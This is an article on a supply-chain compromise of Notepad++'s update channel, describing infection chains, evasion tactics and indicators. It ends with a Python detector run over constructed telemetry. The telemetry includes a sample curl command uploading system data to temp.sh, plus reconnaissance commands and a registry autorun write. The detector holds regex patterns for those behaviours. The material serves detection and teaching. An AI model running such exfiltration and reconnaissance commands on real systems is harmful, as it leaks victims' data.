The implicit trust users place in automatic software updates was profoundly shaken when developers of the popular text editor Notepad++ disclosed a critical security breach affecting their update infrastructure on February 2, 2026. This incident highlights a growing and dangerous trend where threat actors target the software supply chain to distribute malware to unsuspecting users. According to the official statement from the developers, the widely used application became the vector for a sophisticated attack campaign that went undetected for months. The initial compromise occurred at the hosting provider level between June and September 2025, granting attackers persistent access to internal services through December of that year. This extended period of unauthorized access allowed the threat actors to meticulously plan and execute their operation, turning a routine software update into a targeted malware delivery mechanism. The breach serves as a stark reminder that even trusted and reputable software can be subverted, forcing both developers and end-users to reconsider their security posture and the inherent risks of automated software distribution channels.
1. Anatomy of a Sophisticated Campaign
The attack demonstrated an exceptional level of operational sophistication and careful planning, distinguishing it from more common, widespread malware campaigns. Threat actors maintained a dynamic and evolving attack infrastructure over a four-month period, from July to October 2025, continuously rotating their command and control server addresses, downloader components, and final malicious payloads. This constant modification made the campaign a moving target, significantly complicating efforts for security teams to detect, analyze, and neutralize the threat. Rather than a broad-spectrum attack, the operation was highly targeted, affecting only about a dozen machines belonging to specific individuals and organizations. The victims were geographically dispersed, with confirmed targets located in Vietnam, El Salvador, and Australia. The list of compromised entities also included organizations in the Philippines and a specific IT service provider based in Vietnam, suggesting a focused espionage or reconnaissance objective rather than a motive of widespread disruption or financial gain. This surgical precision indicates that the attackers had clear goals and likely conducted prior intelligence gathering to identify their targets.
During their investigation, security analysts from Securelist successfully identified and dissected three distinct infection chains, each employing unique technical characteristics and advanced evasion techniques. This multi-pronged approach further illustrates the attackers’ resourcefulness and determination to remain undetected. The threat actors leveraged a diverse toolkit that included well-known offensive security frameworks such as Metasploit for initial downloaders and Cobalt Strike Beacon for post-exploitation activities, allowing them to maintain control over compromised systems. In the later stages of the campaign, the attackers deployed a custom backdoor known as Chrysalis, indicating a higher level of capability and a desire to use proprietary tools that are less likely to be flagged by standard security solutions. Despite the complexity and variety of malicious payloads observed throughout the campaign, Kaspersky’s security products were reportedly successful in blocking the identified attacks as they occurred, preventing the final objectives of the threat actors from being fully realized on protected systems.
2. Technical Breakdown and Evasion Tactics
The first observable infection chain was initiated in late July 2025, when attackers began distributing a malicious NSIS installer through the compromised Notepad++ update infrastructure. When the legitimate Notepad++.exe updater process executed the malicious update.exe file, the payload immediately began conducting system reconnaissance. It sent a comprehensive profile of the victim’s machine to attacker-controlled servers, using the temp.sh file hosting service as an exfiltration channel. This initial data gathering was thorough, with the malware executing a series of shell commands to collect the current username, a list of running processes, detailed system information, and active network connections. The results of these commands were then carefully packaged and uploaded using crafted curl commands, providing the attackers with critical intelligence to determine if the compromised machine was a target of interest and how to proceed with the next phase of the attack. This automated reconnaissance phase was crucial for the attackers to filter out non-essential victims and focus their efforts exclusively on their intended targets without raising unnecessary alarms.
In a clever move to bypass modern security defenses, the attackers deliberately avoided the commonly used DLL sideloading technique, which is heavily monitored by many endpoint detection and response systems. Instead, they exploited an older, more obscure vulnerability in ProShow software that dates back to the early 2010s. This unconventional approach helped them evade detection systems that are primarily tuned to identify newer and more prevalent attack vectors. The exploit payload was ingeniously crafted with two distinct shellcodes. The first shellcode served merely as padding, designed to confuse and thwart automated analysis and sandboxing environments. The second, operative shellcode was responsible for decrypting a Metasploit downloader. This downloader then retrieved the final Cobalt Strike Beacon shellcode from remote servers, establishing a persistent and powerful backdoor on the victim’s system. This multi-stage, layered exploitation process showcased the attackers’ deep technical expertise and their commitment to remaining hidden while achieving their objectives within the targeted networks.
3. Detection and Mitigation Strategies
Security teams were able to identify this threat by monitoring for specific artifacts and behaviors associated with the malicious NSIS installer. A primary indicator of compromise was the creation of an ns*.tmp working directory under %localappdata%\Temp, the signature behavior of an NSIS installer unpacking itself; because legitimate NSIS-based installers create the same directory, this indicator is weak on its own and is best used in correlation with the others below. In addition, network traffic analysis proved crucial; organizations were advised to inspect for any unusual DNS resolutions to the temp.sh domain, which the attackers used for data exfiltration. System logs also provided vital clues, as security teams could search for the execution of reconnaissance commands such as whoami, tasklist, systeminfo, and netstat originating from unexpected parent processes. By correlating these indicators, defenders could piece together the attack chain and identify compromised systems. Further layers of defense were established through behavioral detection rules designed to flag unauthorized modifications to registry autorun keys, a common persistence mechanism. Monitoring for suspicious connections to legitimate public services abused for command and control (so-called living-off-the-land C2 services, of which temp.sh is one example) also provided an effective method for detecting the ongoing communication between the malware and its controllers, ultimately helping to contain the impact of this sophisticated supply chain compromise.
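The reconnaissance behavior described in section 2 and the indicators listed above can be turned into correlated detection logic. The following is an added example, not code from the original article or from any vendor's rule set. It runs over constructed JSON-lines endpoint telemetry in a simplified, assumed schema (the field names host, type, pid, ppid, parent, image, cmdline, path, query and target are my assumptions, not a real product's), and the alert weights are illustrative choices, not values from the page.

```python
"""Correlate the Notepad++ supply-chain indicators over sample endpoint telemetry.

Rules implemented (each maps to an indicator named in the article):
  nsis_tempdir            - ns*.tmp working directory under %localappdata%\Temp (weak alone)
  dns_temp_sh             - DNS resolution of temp.sh, the exfiltration channel
  recon_unexpected_parent - whoami/tasklist/systeminfo/netstat spawned by a non-interactive parent
  recon_burst             - three or more distinct recon tools launched by the same parent
  curl_upload_temp_sh     - curl command line referencing temp.sh
  autorun_key_write       - write to a CurrentVersion\Run or RunOnce registry key
"""
import json
import re
from collections import Counter, defaultdict

# Constructed sample telemetry (not real data from the incident); WS01 mimics the
# infection chain, WS02 is a clean host that ran a legitimate NSIS installer.
SAMPLE_EVENTS = r'''
{"host":"WS01","type":"dir_create","path":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp"}
{"host":"WS01","type":"process","pid":3900,"ppid":2200,"parent":"C:\\Program Files\\Notepad++\\notepad++.exe","image":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp\\update.exe","cmdline":"update.exe"}
{"host":"WS01","type":"process","pid":4120,"ppid":3900,"parent":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp\\update.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c whoami"}
{"host":"WS01","type":"process","pid":4121,"ppid":3900,"parent":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp\\update.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c tasklist /v"}
{"host":"WS01","type":"process","pid":4122,"ppid":3900,"parent":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp\\update.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c systeminfo"}
{"host":"WS01","type":"process","pid":4123,"ppid":3900,"parent":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp\\update.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c netstat -ano"}
{"host":"WS01","type":"dns","query":"temp.sh"}
{"host":"WS01","type":"process","pid":4130,"ppid":3900,"parent":"C:\\Users\\u\\AppData\\Local\\Temp\\nsa4C2.tmp\\update.exe","image":"C:\\Windows\\System32\\curl.exe","cmdline":"curl -F \"file=@C:\\Users\\u\\AppData\\Local\\Temp\\sysinfo.txt\" https://temp.sh/upload"}
{"host":"WS01","type":"registry_set","target":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"}
{"host":"WS02","type":"dir_create","path":"C:\\Users\\admin\\AppData\\Local\\Temp\\nsb1F3.tmp"}
{"host":"WS02","type":"process","pid":5001,"ppid":4800,"parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\whoami.exe","cmdline":"whoami /all"}
{"host":"WS02","type":"dns","query":"github.com"}
'''

RECON_RE = re.compile(r"\b(whoami|tasklist|systeminfo|netstat)\b", re.IGNORECASE)
NSIS_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\ns[^\\]*\.tmp$", re.IGNORECASE)
AUTORUN_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
# Parents from which an interactive operator would plausibly run recon tools.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}
# Illustrative weights: the NSIS directory is common to benign installers, so it scores low.
WEIGHTS = {"nsis_tempdir": 1, "dns_temp_sh": 3, "recon_unexpected_parent": 2,
           "recon_burst": 3, "curl_upload_temp_sh": 3, "autorun_key_write": 2}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def alert(host, rule, detail):
    return {"host": host, "rule": rule, "detail": detail, "weight": WEIGHTS[rule]}


def evaluate(events):
    """Apply every rule to the event stream and return the list of alerts."""
    alerts = []
    recon_by_parent = defaultdict(set)  # (host, ppid) -> distinct recon tools seen
    for ev in events:
        host, kind = ev["host"], ev["type"]
        if kind == "dir_create" and NSIS_DIR_RE.search(ev["path"]):
            alerts.append(alert(host, "nsis_tempdir", ev["path"]))
        elif kind == "dns" and (ev["query"] == "temp.sh" or ev["query"].endswith(".temp.sh")):
            alerts.append(alert(host, "dns_temp_sh", ev["query"]))
        elif kind == "process":
            cmd = ev["cmdline"]
            match = RECON_RE.search(cmd)
            if match:
                tool = match.group(1).lower()
                recon_by_parent[(host, ev["ppid"])].add(tool)
                if basename(ev["parent"]) not in EXPECTED_PARENTS:
                    alerts.append(alert(host, "recon_unexpected_parent",
                                        f"{tool} spawned by {basename(ev['parent'])}"))
            if basename(ev["image"]) == "curl.exe" and "temp.sh" in cmd.lower():
                alerts.append(alert(host, "curl_upload_temp_sh", cmd))
        elif kind == "registry_set" and AUTORUN_RE.search(ev["target"]):
            alerts.append(alert(host, "autorun_key_write", ev["target"]))
    # A burst of distinct recon tools from one parent is suspicious regardless of the parent;
    # a production rule would also bound this to a short time window.
    for (host, ppid), tools in recon_by_parent.items():
        if len(tools) >= 3:
            alerts.append(alert(host, "recon_burst", f"ppid {ppid} ran {sorted(tools)}"))
    return alerts


def score_hosts(alerts):
    """Sum alert weights per host so correlated weak signals outrank a lone NSIS directory."""
    scores = Counter()
    for a in alerts:
        scores[a["host"]] += a["weight"]
    return dict(scores)


if __name__ == "__main__":
    found = evaluate(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(f"{a['host']:5} {a['rule']:24} {a['detail']}")
    print("scores:", score_hosts(found))
```

On the constructed input, WS01 accumulates a score of 20 across all six rules while WS02 scores 1 from the NSIS directory alone, which is the point of weighting and correlating rather than alerting on any single indicator.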
